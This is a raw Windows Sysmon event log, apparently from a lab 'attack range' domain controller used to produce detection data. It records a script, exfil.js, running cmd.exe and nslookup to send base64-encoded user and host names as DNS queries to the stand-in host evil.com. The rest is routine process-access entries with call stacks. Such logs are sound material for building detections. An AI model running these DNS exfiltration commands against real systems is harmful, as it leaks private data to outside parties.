14:16:08.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.037{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-F03D-000000005F02}7224C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.037{2E1864BB-17A8-629A-EE3D-000000005F02}48325776C:\Windows\system32\cmd.exe{2E1864BB-17A8-629A-F03D-000000005F02}7224C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.045{2E1864BB-17A8-629A-F03D-000000005F02}7224C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A8-629A-EE3D-000000005F02}4832C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljfcv.tmp 2>&1 10341000x8000000000000000194708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.021{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-EF3D-000000005F02}4128C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.021{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-EF3D-000000005F02}4128C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.005{2E1864BB-17A8-629A-EF3D-000000005F02}41282944C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-EE3D-000000005F02}4832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.005{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-EF3D-000000005F02}4128C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.002{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.002{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.002{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.002{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.002{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-EE3D-000000005F02}4832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.001{2E1864BB-17A1-629A-783D-000000005F02}55526432C:\Windows\System32\WScript.exe{2E1864BB-17A8-629A-EE3D-000000005F02}4832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.001{2E1864BB-17A8-629A-EE3D-000000005F02}4832C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljfcv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000195207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.972{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-2B3E-000000005F02}5184C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.972{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-2B3E-000000005F02}5184C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.972{2E1864BB-17A9-629A-2B3E-000000005F02}51842252C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-2A3E-000000005F02}7580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.957{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-2B3E-000000005F02}5184C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000195203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.957{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=104D06CAB938FC3AC7C7C107526E7BF3,SHA256=8B07CE94C03E12F1B3014B6DBF566AABFD1AB2FB329F7DCB75BAF998C7271382,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.941{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.941{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.941{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.941{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.941{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-2A3E-000000005F02}7580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.941{2E1864BB-17A1-629A-783D-000000005F02}55525904C:\Windows\System32\WScript.exe{2E1864BB-17A9-629A-2A3E-000000005F02}7580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.952{2E1864BB-17A9-629A-2A3E-000000005F02}7580C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltoi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.941{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyoh.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000195194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.922{00000000-0000-0000-0000-000000000000}2952<unknown process>-udptruefalse127.0.0.1-52152-false127.0.0.1-53domain 10341000x8000000000000000195193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.888{2E1864BB-17A9-629A-283E-000000005F02}33485036C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-293E-000000005F02}1788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.872{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.872{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.872{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 